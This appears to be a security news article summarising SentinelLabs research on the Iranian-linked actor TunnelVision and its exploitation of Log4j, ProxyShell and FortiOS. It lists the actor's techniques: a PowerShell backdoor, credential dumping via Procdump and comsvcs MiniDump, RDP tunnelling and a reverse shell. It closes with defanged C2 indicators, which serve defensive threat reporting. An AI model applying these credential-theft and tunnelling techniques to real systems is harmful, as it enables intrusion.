According to SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky, “TunnelVision actions are characterised by widespread exploitation of 1-day vulnerabilities in target regions , with intrusions spotted in the Middle East and the United States.”
TunnelVision’s activities in target regions are characterised by widespread exploitation of one-day vulnerabilities. We’ve seen widespread exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell), and most recently Log4Shell during the time we’ve been watching this actor. Fast Reverse Proxy Client (FRPC) and Plink are the most widely used tunnelling tools by the organisation.
- SentinelLabs has been monitoring the activities of a threat actor with Iranian ties operating in the Middle East and the United States.
- We’ve called this cluster of activity TunnelVision because of the threat actor’s extensive dependence on tunnelling tools and the unique way it chooses to widely deploy them.
- TunnelVision’s operations were linked to the distribution of ransomware, making the group a potentially damaging actor, similar to other Iranian threat actors active in the region recently.
The most of the “online” activity were carried out through this PowerShell backdoor. It appears to be a modified version of a public PowerShell one-liner.
Among those activities were:
- Execution of recon commands.
- Creation of a backdoor user and adding it to the administrators group.
- Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
- Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
- Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
- Internal subnet RDP scan using a publicly available port scan script.
Throughout the activity, the threat actor used the name “protections20” on a github repository called “VmWareHorizon” that belonged to an account owned by the threat actor.
A malicious process created from the VMware ViewServerbinws TomcatService.exe (C:Program FilesVMwareVMware ViewServerbinws TomcatService.exe) is used to exploit Log4j in VMware Horizon.
Finally the researchers concluded that ,” The cybersecurity firm linked the attacks to a different Iranian cluster, not because they’re unrelated, there is currently insufficient data to classify them as identical to any of the aforementioned attributions.”
Indicators of Compromise
|Domain||www[.]microsoft-updateserver[.]cf||Command and Control (C2) Server|
|IP||51.89.169[.]198||Command and Control (C2) Server|
|IP||142.44.251[.]77||Command and Control (C2) Server|
|IP||51.89.135[.]142||Command and Control (C2) Server|
|IP||51.89.190[.]128||Command and Control (C2) Server|
|IP||51.89.178[.]210||Command and Control (C2) Server, Tunneling Server|
|Github Account||https://github.com/protections20||Account utilized to host payloads|